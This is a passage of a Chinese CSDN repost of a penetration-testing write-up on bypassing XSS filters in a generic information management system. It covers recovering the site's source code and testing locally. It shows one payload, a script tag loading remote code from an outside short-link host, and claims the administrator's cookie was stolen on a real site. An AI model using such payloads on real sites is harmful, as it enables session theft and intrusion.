xss防御方法base64_绕过某通用信息管理系统实现XSS

本文介绍了在渗透测试中遇到的XSS防御及如何利用Base64编码和路径遍历技巧绕过限制。作者通过获取系统源码、分析过滤规则,结合Unicode和Hex编码,成功实现XSS攻击。强调在复杂环境中需结合多种思路以应对安全挑战。
摘要由CSDN通过智能技术生成

8e91bdfd061ca8ebfd4b889ffed0dc06.png

作者:青空酱 合天智汇

原创投稿活动:重金悬赏 | 合天原创投稿等你来

82955a2fec1999bf4c6f7665045e99e0.png

序言

实战渗透某站点时遇到的,经过几天研究最终成功绕过限制并打到管理员cookie,特此记录下备忘。将一些琐碎的trick和知识点进行了有机结合与综合实践,希望本文能对读者有所帮助,若有谬误,还请指正。

4ff61aa954676b5393d6775619cac0a1.png

准备工作

首先看看站点,事先测过了SQL等漏洞,这里只测试XSS。

7b2e3a416037962f9b169d2967750539.png

先尝试填充一些正常数据以判断是否会回显payload,经过测试,该站点提交信息会直接跳转回首页,无法查看payload解析执行情况。

注意:测试xss时往往不要一上来就怼<script>/:..等危险字符,有暴露渗透行为的风险且难以控制页面显示情况。

看不到回显难道就要盲打嘛?

这里提供一个思路:尝试获取该系统的源码并本地搭建进行测试。

好的,既然思路明确了,我们就尝试去获取该系统的源码。

  1. 扫描敏感目录及文件,查看是否存在.git / .svn等代码工程文件,如果存在的话,是 可以直接通过该敏感文件还原出系统源码的。

相关工具:https://github.com/lijiejie/GitHack

Seay-svn 还原工具,大家可以自行下载

  1. 从源码本身着手,寻找版权相关信息,之后去网上寻找并下载源码。

渗透该站时便使用了方法2,尝试访问后台时网页便爆出了我们想要的信息。

159985e9fa7de4c79a3279e35f8953f3.png

搜索相关源码并下载,成功在本地搭建。

280ab505cf3f5b9ef71dbc10cf9e6e86.png

好了,这样我们就可以放心测试xss了。(本地你想怎么怼都不会有风险的),关于XSS的学习,可以到合天网安实验室学习渗透XSS漏洞原理和利用,点击“实验:渗透XSS漏洞原理和利用(合天网安实验室)”可操作学习。

9c43931533c35dc061aa77ac4bfcfc60.png

e858d786eee901ace9277b1aecdd6f28.png

好戏开演

准备好payload:

<script src="http://x.co/qwq"></script>

这里推荐一个网站缩短服务:

http://x.co

访问设置url即可

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值